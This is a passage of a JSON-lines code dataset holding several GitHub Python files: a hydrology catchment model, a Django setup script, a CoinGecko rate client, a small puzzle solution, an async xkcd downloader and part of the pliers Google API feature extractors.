uf=row['source_state_code'], cidade=row['source_territory_name'], tema=row['excerpt_subthemes'], data=row['source_created_at'])\n db_gen = get_db()\n db = next(db_gen)\n count_excerpt+=1 if (create_excerpt_metadata(db, excerpt_metadata)) else False\n if len(names) > 0:\n for name in names:\n item = NamedEntityCreate(excerpt_id=name['excerpt_id'], content=name['content'], start_offset=name['start_offset'], end_offset=name['end_offset'], entity_type=name['entity_type'])\n\n count_named_entities+=1 if (create_named_entity(db, item)) else False\n\n return \"Saved \" + str(count_excerpt) + \" excerpt ids and \" + str(count_named_entities) + \" named entitites\"","repo_name":"MLRG-CEFET-RJ/qdrec","sub_path":"scripts/bert_ner_processor.py","file_name":"bert_ner_processor.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"11817378517","text":"# -*- coding: utf-8 -*-\nimport os, io, re, subprocess, copy, graphviz as gv, pandas as pd, matplotlib.pyplot as plt, numpy as np\nfrom scipy.interpolate import griddata\nfrom matplotlib.cm import ScalarMappable\nfrom matplotlib.colors import Normalize\n\nos.environ['PATH']=os.environ['PATH']+\";C:\\\\Program Files (x86)\\\\Graphviz2.38\\\\bin\"\n\nclass Catchment(object):\n \"\"\"\n Class for catchment implemented as a linked list\n \"\"\"\n def __init__(self):\n self.reaches = {}\n self.canStart = {}\n self.canBeCleaned = {}\n self.failed = {}\n self.nReachDone = 0\n self.ouletReaches = []\n self.inletReaches = []\n \n def addReach(self,ID, reachData, hydrologyMassLoadingsFileBase):\n \"\"\"\n Adds a reach to the catchment. \n \"\"\"\n self.reaches[ID] = Reach(ID, reachData, hydrologyMassLoadingsFileBase, self.signalStatusChange)\n\n def finalize(self):\n \"\"\"\n Finalize the catchment after all reaches have been added.\n Sets the links between the reaches.\n \"\"\"\n self.nReach = len(self.reaches)\n\n # The Directed Acyclic Graph specifying the watershed topology\n # A dict with for each reach a tuple with the downstream reaches\n self.directedGraph = {}\n\n for reach in self: # for every reach...\n for dId in list(reach.downstreamRef): # loop through downstream reaches\n if not dId in self.reaches.keys():\n # remove downstream reach if it is not in the catchment (e.g. if catchment is cropped)\n del(reach.downstreamRef[dId])\n reach.downstreamIDs.remove(dId)\n else:\n downstreamReach = self.reaches[dId]\n reach.set_downstreamRef(downstreamReach) # set reference to downstream reaches for this reach\n downstreamReach.set_upstreamRef(reach) # set upstream refence to this reach for downstream reaches\n downstreamReach.upstreamIDs.append(reach.ID)\n self.directedGraph[reach.ID] = (dId,)\n \n for reach in self:\n # determine the inlet and outlet reaches\n if len(reach.downstreamIDs)==0:\n self.ouletReaches.append(reach)\n if len(reach.upstreamIDs)==0:\n self.inletReaches.append(reach)\n\n # set the current status of the reaches and whether or not they have loading from upstream\n # checkstatus() and set_hasUpstreamLoading() propagate downward in the catchment so looping\n # over inlet reaches is sufficient\n for reach in self.inletReaches:\n reach.checkStatus()\n reach.set_hasUpstreamLoading()\n \n for reach in self:\n # set flag indicating whether mass outflow (MFU) file is Needed\n reach.set_massOutflowFileNeeded()\n\n \n def __iter__(self):\n \"\"\"\n Returns iterator over reaches\n \"\"\"\n return(iter(self.reaches.values()))\n\n @property\n def reachIDs(self):\n \"\"\"\n Returns list of reach IDs\n \"\"\"\n return(list(self.reaches.keys()))\n\n def __getitem__(self,ID):\n \"\"\"\n Returns reach for specified ID. ID may be a dict key, a index, or a slice\n \"\"\"\n if isinstance(ID, int):\n return(list(self.reaches.values())[ID])\n elif isinstance(ID,slice):\n return(list(self.reaches.values())[ID])\n else:\n return(self.reaches[ID])\n\n def __getattr__(self,name):\n \"\"\"\n Returns a dict for all reaches with reachIDs as keys and attribute \n name as values. If an attribute accessed that is not a member of Catchment, this\n function is called. 
This allows reach attribute prop to be accessed as\n catchment.prop, provided that prop is not an attribute of catchement.\n \"\"\"\n return({reach.ID: getattr(reach,name) for reach in self})\n\n def signalStatusChange(self,reach):\n \"\"\"\n Called by reaches to inform the catchment object of a status change.\n This is used to maintain a list of reaches that can start.\n \"\"\"\n if reach.stat == Reach.flagCanStart:\n self.canStart[reach.ID] = reach\n elif reach.stat == Reach.flagRunning:\n if reach.ID in self.canStart: del self.canStart[reach.ID]\n elif reach.stat == Reach.flagCanBeCleaned:\n self.canBeCleaned[reach.ID] = reach\n elif reach.stat == Reach.flagCleaning:\n del self.canBeCleaned[reach.ID]\n elif reach.stat == Reach.flagDone:\n self.nReachDone += 1\n elif reach.stat in [Reach.flagError, Reach.flagUpstreamError]:\n if reach.ID in self.canStart: del self.canStart[reach.ID]\n self.failed[reach.ID] = reach\n\n @property\n def canStartReaches(self):\n return([reach for reach in self.canStart.values()])\n\n @property\n def canBeCleanedReaches(self):\n return([reach for reach in self.canBeCleaned.values()])\n\n @property\n def failedList(self):\n return self.failed\n\n def getReachProp(self, prop, reachIds = None):\n \"\"\"\n Returns reach property for all, or a selection of reaches\n \"\"\"\n return([reach.getProperty(prop) for reach in self])\n\n @property\n def isDone(self):\n return self.nReachDone==len(self.reaches)\n\n def catchmentMap(self, colorVals = None, valRange = [0,1], fileName = None, title = None, linewidth = 5):\n withnames = False\n #create figure object and color map\n fig = plt.figure(figsize=(12,12))\n ax = fig.add_subplot(111)#, projection=\"3d\")\n ax.set_xlabel(\"X [m]\")\n ax.set_ylabel(\"Y [m]\")\n ax.grid(True)\n \n if type(colorVals) == list:\n cmap = ScalarMappable(cmap='jet',norm = Normalize(valRange[0],valRange[1]))\n cmap.set_array(valRange)\n colorFcn = lambda x: '#%02x%02x%02x' % cmap.to_rgba(x,bytes=True)[0:3]\n else:\n cmap = None\n colorVals = [colorVals]*len(self.reaches)\n colorFcn = lambda x: colorVals[0]\n \n # plot reaches\n for index, reach in enumerate(self): \n for downstream_reach in reach.downstreamRefs:\n ax.plot([reach.x,downstream_reach.x],[reach.y,downstream_reach.y],color=colorFcn(colorVals[index]), linewidth = linewidth) \n if withnames:\n x_coord = (reach.x+downstream_reach.x)/2. \n y_coord = (reach.y+downstream_reach.y)/2. 
\n ax.text(x_coord,y_coord,reach.key, verticalalignment='bottom', horizontalalignment='right',\n color=fontcolor, fontsize=fontsize, \n bbox=dict(facecolor=color_waterbody, edgecolor='None', boxstyle='round,pad=.2',alpha=.5))\n \n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n if not cmap is None: \n cbar = plt.colorbar(cmap, ax = ax)\n cbar.ax.tick_params(labelsize=15) \n if not title is None: plt.title(title,fontsize=18)\n if not fileName is None:\n plt.savefig(os.path.join(fileName))\n plt.close()\n\n \n def catchmentGraph(self, colorVals = None, colorMap = 'jet', range = [0,1], format = 'pdf', fileName = 'graph'):\n # Makes a graph of the reaches and their connections with graphviz.\n dot = gv.Digraph(engine= 'dot')\n dot.attr('graph', nodesep='1',ranksep = '0.005', margin = '0')\n dot.attr('node', margin = '0',fixedsize = 'false', fontsize = '6',width = '0.1',\n height = '0.05', shape = 'box', style = 'filled', penwidth = '0.0')\n dot.attr('edge', arrowsize = '0.2', penwidth = '0.25')\n\n if not colorVals is None:\n cmap = ScalarMappable(cmap=colorMap,norm = Normalize(range[0],range[1]))\n colorFcn = lambda x: '#%02x%02x%02x' % cmap.to_rgba(x,bytes=True)[0:3]\n else:\n colorFcn = lambda x: None\n colorVals = [0]*self.nReach\n \n for idx, reach in enumerate(self):\n dot.node(reach.ID,label = reach.ID, fillcolor = colorFcn(colorVals[idx])) # add node/reach\n if len(reach.downstreamRef)>0: # add connections to down stream\n dot.edge(reach.ID, list(reach.downstreamRefs)[0].ID, weight = '10')\n try:\n dot.render(filename=fileName, format = format, renderer=None, formatter=None)\n except:\n pass\n\nclass Reach(object):\n \"\"\"\n Class for reach.\n \"\"\"\n\n # Status flags\n flagWaiting = 0\n flagCanStart = 1\n flagRunning = 2\n flagRunDone = 3\n flagCanBeCleaned = 4\n flagCleaning = 5\n flagDone = 6\n flagError = 7\n flagUpstreamError = 8\n\n def __init__(self, ID, reachData, hydrologyMassLoadingsFileBase, signalStatusChange):\n \"\"\"\n Creats a reach object.\n \"\"\"\n if not type(reachData.RchIDDwn) is list: reachData.RchIDDwn = [reachData.RchIDDwn]\n self.ID = ID\n self.hydrologyMassLoadingsFile = ID + hydrologyMassLoadingsFileBase\n self.length = reachData.Len\n self.downstreamIDs = reachData.RchIDDwn\n self.upstreamIDs = []\n self.downstreamRef = {ID:None for ID in reachData.RchIDDwn}\n self.upstreamRef = {}\n self.width = reachData.WidWatSys\n self.slope = reachData.SloSidWatSys\n self.suspSolids = reachData.ConSus\n self.omSuspSolids = reachData.CntOmSusSol\n self.bulkDens = reachData.Rho\n self.porosity = reachData.ThetaSat\n self.omSediment = reachData.CntOM\n self.nSegments = 1\n self.signalStatusChange = signalStatusChange\n self.stat = Reach.flagWaiting\n self.hasDrift = reachData.Expsd\n self.hasUpstreamLoading = False\n self.x = reachData.X\n self.y = reachData.Y\n self.massOutflowFileNeeded = None\n\n def unlink(self):\n \"\"\"\n Returns an \"unlinked\" copy of the reach, with all references to other reaches and the catchment set to None.\n \"\"\"\n cp = copy.copy(self)\n cp.downstreamRef = None\n cp.upstreamRef = None\n cp.signalStatusChange = None\n return(cp)\n\n def set_downstreamRef(self,reach):\n \"\"\"\n Sets the reference to a single downstream reach.\n \"\"\"\n if self.downstreamRef[reach.ID] is None: self.downstreamRef[reach.ID] = reach\n\n def set_upstreamRef(self,reach):\n \"\"\"\n Sets the reference to a single upstream reach.\n \"\"\"\n if not reach.ID in self.upstreamRef.keys(): self.upstreamRef[reach.ID] = reach\n\n @property\n def 
status(self):\n \"\"\"\n Returns the status of this reach.\n If the status waiting, it will be updated first, by checking the upstream reaches.\n NB: this function has the property decorator, meaning that if the reach status is \n accessed as reach.status, this function will be called.\n \"\"\"\n if self.stat == Reach.flagWaiting: self.checkStatus()\n return(self.stat)\n\n @status.setter\n def status(self, status):\n \"\"\"\n Sets status of this reach.\n If the status is done, the downstream reaches will be asked to update their status as well.\n If the status is (upstream)error: all downstream reaches will get upstream error.\n NB: this function has the setter decorator, meaning that if a reach status is set using \n reach.status = status, this function will be called.\n \"\"\"\n self.stat = status\n if not self.signalStatusChange is None: self.signalStatusChange(self)\n if status in [Reach.flagError, Reach.flagUpstreamError]:\n for reach in self.downstreamRefs: reach.status = Reach.flagUpstreamError\n elif status == Reach.flagRunDone:\n for reach in self.downstreamRefs: reach.checkStatus()\n for reach in self.upstreamRefs: reach.checkStatus()\n self.checkStatus()\n \n @property\n def upstreamRefs(self):\n \"\"\"\n Returns iterator over upstream reaches\n \"\"\"\n return(iter(self.upstreamRef.values()))\n\n @property\n def downstreamRefs(self):\n \"\"\"\n Returns iterator over downstream reaches\n \"\"\"\n return(iter(self.downstreamRef.values()))\n\n @property\n def skip(self):\n return(not(self.hasUpstreamLoading or self.hasDrift))\n\n def waterResidenceTime(self,waterDepth,flowRate):\n return self.waterVolume(waterDepth)/flowRate\n\n def waterVolume(self,waterDepth):\n return self.waterCrossSectionArea(waterDepth)*self.length\n\n def waterCrossSectionArea(self,waterDepth):\n return waterDepth*(self.width + waterDepth*self.slope)\n\n def checkStatus(self):\n \"\"\"\n Checks status for this reach, by looking at the upstream and downstream reaches.\n If the current status is runDone and all downstream reaches are runDone as well, the status\n is set to canBeCleaned. \n If the status is all upstream reaches have status runDone or done, this reach will get status canStart.\n If any of the upstream reaches has status (upstream)error this reach will get status upstreamError\n \"\"\"\n\n if self.stat == Reach.flagRunDone:\n if not self.downstreamRefs or all([reach.status in [Reach.flagRunDone, Reach.flagDone] for reach in self.downstreamRefs]):\n self.status = Reach.flagCanBeCleaned\n elif self.stat == Reach.flagWaiting:\n if not self.upstreamRef or all([reach.status in [Reach.flagRunDone, Reach.flagDone] for reach in self.upstreamRefs]):\n self.status = Reach.flagCanStart\n elif any([reach.status in [Reach.flagError, Reach.flagUpstreamError] for reach in self.upstreamRefs]):\n self.status = Reach.flagUpstreamError\n\n def set_hasUpstreamLoading(self,flag = False):\n self.hasUpstreamLoading = flag or self.hasUpstreamLoading\n for reach in self.downstreamRefs:\n reach.set_hasUpstreamLoading(self.hasUpstreamLoading or self.hasDrift)\n\n def set_massOutflowFileNeeded(self):\n self.massOutflowFileNeeded = any([not reach.skip for reach in self.downstreamRefs])","repo_name":"xlandscape/CascadeToxswa-Component","sub_path":"module/src/Catchment.py","file_name":"Catchment.py","file_ext":"py","file_size_in_byte":14295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"28082961058","text":"import os\nfrom setuptools import setup, find_packages\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nwith open('requirements.txt') as f:\n install_requires = f.read().splitlines()\n\nsetup(\n name='django-simple-activity',\n version='1.1.1.dev0',\n packages=find_packages('src', exclude=('tests',)),\n package_dir={'': 'src'},\n include_package_data=True,\n license='Apache 2.0',\n description=(\n 'Simple, generic, activity streams '\n 'from the actions on your site.'),\n url='https://github.com/richardasaurus/django-simple-activity',\n author='Richard O\\'Dwyer',\n author_email='richard@richard.do',\n zip_safe=True,\n install_requires=install_requires\n)\n","repo_name":"richardARPANET/django-simple-activity","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8701903908","text":"import requests\n\nfrom clients.currency.coingecko.defs import CoinGeckoCrypto\nfrom clients.currency.coingecko.exceptions import CoinGeckoRequestException\nfrom moneybox.settings import COINGECKO_URL, COINGECKO_TIMEOUT\nfrom wallet.models.currency import FiatCurrency\n\n\nclass CoinGeckoClient:\n def __init__(self, url: str = COINGECKO_URL, timeout: int = COINGECKO_TIMEOUT) -> None:\n self.url = url\n self.timeout = timeout\n\n def get_rates(self):\n try:\n response = requests.get(\n url=self.url.format(\n crypto_currencies=\",\".join(CoinGeckoCrypto.map_main_crypto_to_coingecko().values()),\n fiat_currency=FiatCurrency.RUB,\n ),\n timeout=self.timeout,\n )\n rates = response.json()\n except requests.exceptions.RequestException as e:\n raise CoinGeckoRequestException(e)\n result = dict()\n for k, v in rates.items():\n result[CoinGeckoCrypto.map_coingecko_to_main_crypto(k)] = round(v.get(FiatCurrency.RUB.lower()), 4)\n return result\n\n\ncoingecko_client = CoinGeckoClient()\n","repo_name":"tanja-ovc/django-moneybox","sub_path":"moneybox/clients/currency/coingecko/coingecko.py","file_name":"coingecko.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"20351688594","text":"import sys\nimport heapq\n\ninput = sys.stdin.readline\n\n\nclass Voca:\n def __init__(self, voca):\n self.voca = voca\n\n def __lt__(self, other):\n return self.voca.lower() < other.voca.lower()\n\n\nif __name__ == \"__main__\":\n while True:\n t = int(input().strip())\n if t == 0:\n break\n que = []\n for _ in range(t):\n voca = Voca(input().strip())\n heapq.heappush(que, voca)\n answer: Voca = heapq.heappop(que)\n print(answer.voca)\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/2204/2204.py","file_name":"2204.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17416527332","text":"import aiohttp\nimport asyncio\nimport time\n\nrecord=open(\"Task2_AsyncTime.txt\",\"w\")\nfilename = \"Task2_Async.txt\" # create a file with a unique name\nf=open(filename,'a') #APPENDING A SINGLE FILE SINCE I'M NOT SURE IF CREATING 200 FILES WOULD BE A GOOD IDEA\n\nasync def getOnePage(session,comic_id: int):\n url = f\"https://xkcd.com/{comic_id}/info.0.json\"\n async with session.get(url) as sesh:\n content=await sesh.read()\n print(content,file=f) #writing contents into the file one by one here\n print(f\"Begin downloading {url}\")\n result=await sesh.json()\n print(f\"Finished downloading {url}\")\n return result\n\nasync def getAllPages(session):\n tasks=[] #creating a dynamic array to store all the tasks we want to rin parallely\n for i in range(1,201): #will take values 1-200 in loop\n task=asyncio.create_task(getOnePage(session,i))\n tasks.append(task)\n \n \n results= await asyncio.gather(*tasks) #pointing to the list so that all the members are defined as async task\n return results\n\nasync def Main():\n async with aiohttp.ClientSession() as sesh:\n downloads = await getAllPages(sesh)\n return downloads\n\n\nif __name__ == \"__main__\":\n start=time.time()\n finalresult=asyncio.run(Main())\n timeTaken=time.time()-start\n print(f\"Time taken= {timeTaken:0.2f} seconds\")\n record.writelines(str(timeTaken)+\"\\n\")\n record.close\n\n\n\n \n","repo_name":"JebronLames32/KOSS_Task","sub_path":"Task2/Task1_Writeinfile_async.py","file_name":"Task1_Writeinfile_async.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27986984594","text":"''' Google API-based feature extraction classes. '''\n\nimport logging\nimport time\nimport warnings\nimport os\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\n\nfrom pliers.extractors.image import ImageExtractor\nfrom pliers.extractors.text import TextExtractor\nfrom pliers.extractors.video import VideoExtractor\nfrom pliers.transformers import (GoogleAPITransformer,\n GoogleVisionAPITransformer,\n GoogleAPITransformer)\nfrom pliers.extractors.base import ExtractorResult\nfrom pliers.utils import flatten_dict\n\n\nclass GoogleVisionAPIExtractor(GoogleVisionAPITransformer, ImageExtractor):\n\n ''' Base class for all Extractors that use the Google Vision API. '''\n\n VERSION = '1.0'\n\n def _extract(self, stims):\n request = self._build_request(stims)\n responses = self._query_api(request)\n\n results = []\n for i, response in enumerate(responses):\n if response and self.response_object in response:\n raw = response[self.response_object]\n results.append(ExtractorResult(raw, stims[i], self))\n elif 'error' in response:\n raise Exception(response['error']['message'])\n else:\n results.append(ExtractorResult([{}], stims[i], self))\n\n return results\n\n\nclass GoogleVisionAPIFaceExtractor(GoogleVisionAPIExtractor):\n\n ''' Identifies faces in images using the Google Cloud Vision API. '''\n\n request_type = 'FACE_DETECTION'\n response_object = 'faceAnnotations'\n\n def _to_df(self, result, handle_annotations=None):\n '''\n Converts a Google API Face JSON response into a Pandas Dataframe.\n\n Args:\n result (ExtractorResult): Result object from which to parse out a\n Dataframe.\n handle_annotations (str): How returned face annotations should be\n handled in cases where there are multiple faces.\n 'first' indicates to only use the first face JSON object, all\n other values will default to including every face.\n '''\n annotations = result._data\n if handle_annotations == 'first':\n annotations = [annotations[0]]\n\n face_results = []\n for i, annotation in enumerate(annotations):\n data_dict = {}\n for field, val in annotation.items():\n if 'Confidence' in field:\n data_dict['face_' + field] = val\n elif 'oundingPoly' in field:\n for j, vertex in enumerate(val['vertices']):\n for dim in ['x', 'y']:\n name = '%s_vertex%d_%s' % (field, j+1, dim)\n val = vertex[dim] if dim in vertex else np.nan\n data_dict[name] = val\n elif field == 'landmarks':\n for lm in val:\n if 'type' in lm:\n name = 'landmark_' + lm['type'] + '_%s'\n lm_pos = {name %\n k: v for (k, v) in lm['position'].items()}\n data_dict.update(lm_pos)\n else:\n data_dict[field] = val\n\n face_results.append(data_dict)\n\n return pd.DataFrame(face_results)\n\n\nclass GoogleVisionAPILabelExtractor(GoogleVisionAPIExtractor):\n\n ''' Labels objects in images using the Google Cloud Vision API. '''\n\n request_type = 'LABEL_DETECTION'\n response_object = 'labelAnnotations'\n\n def _to_df(self, result):\n res = {label['description']: label['score'] for label in result._data if label}\n return pd.DataFrame([res])\n\n\nclass GoogleVisionAPIPropertyExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts image properties using the Google Cloud Vision API. 
'''\n\n request_type = 'IMAGE_PROPERTIES'\n response_object = 'imagePropertiesAnnotation'\n\n def _to_df(self, result):\n colors = result._data['dominantColors']['colors']\n data_dict = {}\n for color in colors:\n rgb = color['color']\n key = [rgb.get('red', 0), rgb.get('green', 0), rgb.get('blue', 0)]\n key = ', '.join([str(v) for v in key])\n data_dict[key] = color['score']\n return pd.DataFrame([data_dict])\n\n\nclass GoogleVisionAPISafeSearchExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts safe search detection using the Google Cloud Vision API. '''\n\n request_type = 'SAFE_SEARCH_DETECTION'\n response_object = 'safeSearchAnnotation'\n\n def _to_df(self, result):\n return pd.DataFrame([result._data])\n\n\nclass GoogleVisionAPIWebEntitiesExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts web entities using the Google Cloud Vision API. '''\n\n request_type = 'WEB_DETECTION'\n response_object = 'webDetection'\n\n def _to_df(self, result):\n data_dict = {}\n if 'webEntities' in result._data:\n for entity in result._data['webEntities']:\n if 'description' in entity and 'score' in entity:\n data_dict[entity['description']] = entity['score']\n return pd.DataFrame([data_dict])\n\n\nclass GoogleVideoIntelligenceAPIExtractor(GoogleAPITransformer, VideoExtractor):\n\n ''' Extracts object features from videos using the Google Vision Video\n Intelligence API.\n\n Args:\n features (list): List of features to extract. LABEL_DETECTION extracts\n tags present throughout the provided segments (full video if none\n provided) as well as throughout the shots (depending on config).\n SHOT_CHANGE_DETECTION extracts a shot feature with onsets and\n durations corresponding to shot changes in the video.\n EXPLICIT_CONTENT_DETECTION extracts any frame onsets of explicit\n material.\n segments (list): List of JSON objects or dictionaries. Each dictionary\n should contain a startTimeOffset and an endTimeOffset field with\n timestamps of the format XX.XXs marking the desired segments upon\n which to extract features.\n config (dict): JSON object representing the desired configuration for\n extraction. See the Google Cloud Video Intelligence documentation\n for more details.\n timeout (int): Number of seconds to wait for video intelligence\n operation to finish. 
Defaults to 90 seconds.\n request_rate (int): Number of seconds to wait between polling the\n extraction operation for completion.\n discovery_file (str): path to discovery file containing Google\n application credentials.\n api_version (str): API version to use.\n max_results (int): Max number of results per page.\n num_retries (int): Number of times to retry query on failure.\n rate_limit (int): The minimum number of seconds required between\n transform calls on this Transformer.\n '''\n\n api_name = 'videointelligence'\n _log_attributes = ('discovery_file', 'api_version', 'features', 'segments',\n 'config', 'timeout', 'request_rate')\n\n def __init__(self, features=['LABEL_DETECTION', 'SHOT_CHANGE_DETECTION',\n 'EXPLICIT_CONTENT_DETECTION'],\n segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n self.features = features\n self.segments = segments\n self.config = config\n self.timeout = timeout\n self.request_rate = request_rate\n super().__init__(discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n def _query_api(self, request):\n request_obj = self.service.videos().annotate(body=request)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _query_operations(self, name):\n if hasattr(self.service.operations(), 'get'):\n request_obj = self.service.operations().get(name=name)\n else:\n request_obj = self.service.projects().locations().\\\n operations().get(name=name)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _build_request(self, stim):\n\n context = self.config if self.config else {}\n if self.segments:\n context['segments'] = self.segments\n\n with stim.get_filename() as filename:\n size = os.path.getsize(filename)\n LIMIT = 524288000\n if size > LIMIT:\n warnings.warn(\"Video file is very large ({} bytes) and may \"\n \"exceed the Google Video Intelligence payload \"\n \"limit ({} bytes).\".format(size, LIMIT))\n\n request = {\n 'inputContent': stim.get_bytestring(),\n 'features': self.features,\n 'videoContext': context\n }\n\n return request\n\n def _extract(self, stim):\n op_request = self._build_request(stim)\n operation = self._query_api(op_request)\n\n msg = \"Beginning video extraction with a timeout of %fs. 
Even for \"\\\n \"small videos, full extraction may take awhile.\" % self.timeout\n logging.warning(msg)\n\n operation_start = time.time()\n response = self._query_operations(operation['name'])\n while 'done' not in response and \\\n (time.time() - operation_start) < self.timeout:\n response = self._query_operations(operation['name'])\n time.sleep(self.request_rate)\n\n if (time.time() - operation_start) >= self.timeout:\n msg = \"The extraction reached the timeout limit of %fs, which \"\\\n \"means the API may not have finished analyzing the video \"\\\n \"and the results may be empty or incomplete.\" % self.timeout\n logging.warning(msg)\n\n return ExtractorResult(response, stim, self)\n\n def _get_onset_duration(self, timing_json):\n onset = float(timing_json['startTimeOffset'][:-1])\n end = float(timing_json['endTimeOffset'][:-1])\n return onset, (end - onset)\n\n def _parse_label(self, data, features, label):\n for segment in label.get('segments', []):\n onset, duration = self._get_onset_duration(segment['segment'])\n score = segment['confidence']\n data[(onset, duration)].update({f: score for f in features})\n\n def _parse_frame(self, data, features, annotation, score_key, max_time):\n frames = annotation.get('frames', [])\n for i, frame in enumerate(frames):\n onset = float(frame['timeOffset'][:-1])\n if (i + 1) == len(frames):\n end = max_time\n else:\n end = float(frames[i+1]['timeOffset'][:-1])\n duration = end - onset\n score = frame[score_key]\n data[(onset, duration)].update({f: score for f in features})\n\n def _to_df(self, result):\n response = result._data.get('response', {})\n data = defaultdict(dict)\n for r in response.get('annotationResults', []):\n for key, res in r.items():\n if 'Label' in key:\n for annot in res:\n feats = [annot['entity']['description']]\n for category in annot.get('categoryEntities', []):\n feats.append('category_' + category['description'])\n if key == 'frameLabelAnnotations':\n self._parse_frame(data, feats, annot, 'confidence',\n result.stim.duration)\n else:\n # Good for shot or segment labels\n self._parse_label(data, feats, annot)\n elif key == 'shotAnnotations':\n for i, shot in enumerate(res):\n onset, duration = self._get_onset_duration(shot)\n data[(onset, duration)].update({\n 'shot_id': i\n })\n elif key == 'explicitAnnotation':\n feature = 'pornographyLikelihood'\n self._parse_frame(data, [feature], res, feature,\n result.stim.duration)\n\n df = pd.DataFrame(list(data.values()))\n # If multiple confidences were parsed, uses the last one\n if len(data) > 0:\n onsets, durations = zip(*list(data.keys()))\n result._onsets = onsets\n result._durations = durations\n result.features = list(df.columns)\n return df\n\n\nclass GoogleVideoAPILabelDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts image labels using the Google Video Intelligence API '''\n\n def __init__(self, mode='SHOT_MODE', stationary_camera=False,\n segments=None, timeout=90, request_rate=5, num_retries=3,\n discovery_file=None, api_version='v1', max_results=100,\n rate_limit=None, frame_confidence_threshold=None,\n video_confidence_threshold=None):\n\n config = {\n 'labelDetectionConfig': {\n 'labelDetectionMode': mode,\n 'stationaryCamera': stationary_camera\n }\n }\n\n if frame_confidence_threshold is not None:\n if mode not in ['FRAME_MODE', 'SHOT_AND_FRAME_MODE']:\n raise ValueError(\n \"frame_confidence_threshold can only be specified in\"\n \"FRAME or SHOT_AND_FRAME modes.\")\n else:\n config['labelDetectionConfig']['frameConfidenceThreshold'] = 
\\\n frame_confidence_threshold\n\n if video_confidence_threshold is not None:\n if mode not in ['SHOT_MODE', 'SHOT_AND_FRAME_MODE']:\n raise ValueError(\n \"video_confidence_threshold can only be specified in\"\n \"SHOT or SHOT_AND_FRAME modes.\")\n else:\n config['labelDetectionConfig']['videoConfidenceThreshold'] = \\\n video_confidence_threshold\n\n super().__init__(features=['LABEL_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleVideoAPIShotDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts shot changes using the Google Video Intelligence API '''\n\n def __init__(self, segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n super().__init__(features=['SHOT_CHANGE_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleVideoAPIExplicitDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts explicit content using the Google Video Intelligence API '''\n\n def __init__(self, segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n super().__init__(features=['EXPLICIT_CONTENT_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPIExtractor(GoogleAPITransformer, TextExtractor):\n\n ''' Extracts natural language features from text documents using the\n Google Natural Language API.\n\n Args:\n features (list): List of features (str) to extract. Available\n features: extractSyntax, extractEntities, extractDocumentSentiment,\n extractEntitySentiment, and classifyText. See Google Natural\n Language API documentation for more details.\n language (str): The ISO-639-1 or BCP-47 identifier for the document\n language. If None is provided, API auto-detects the language.\n is_html (bool): When True, the document's text is expected to be\n HTML. 
Otherwise, plain text is assumed.\n discovery_file (str): path to discovery file containing Google\n application credentials.\n api_version (str): API version to use.\n max_results (int): Max number of results per page.\n num_retries (int): Number of times to retry query on failure.\n rate_limit (int): The minimum number of seconds required between\n transform calls on this Transformer.\n '''\n\n api_name = 'language'\n _log_attributes = ('discovery_file', 'api_version', 'features',\n 'language', 'is_html')\n\n def __init__(self, features=['extractSyntax',\n 'extractEntities',\n 'extractDocumentSentiment',\n 'extractEntitySentiment',\n 'classifyText'],\n language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n self.features = features\n self.language = language\n self.is_html = is_html\n super().__init__(discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n def _query_api(self, request):\n request_obj = self.service.documents().annotateText(body=request)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _build_request(self, stim):\n document = {\n 'type' : 'HTML' if self.is_html else 'PLAIN_TEXT',\n 'content' : stim.text\n }\n\n if self.language:\n document['language'] = self.language\n\n request = {\n 'document': document,\n 'features': { f : True for f in self.features },\n 'encodingType': 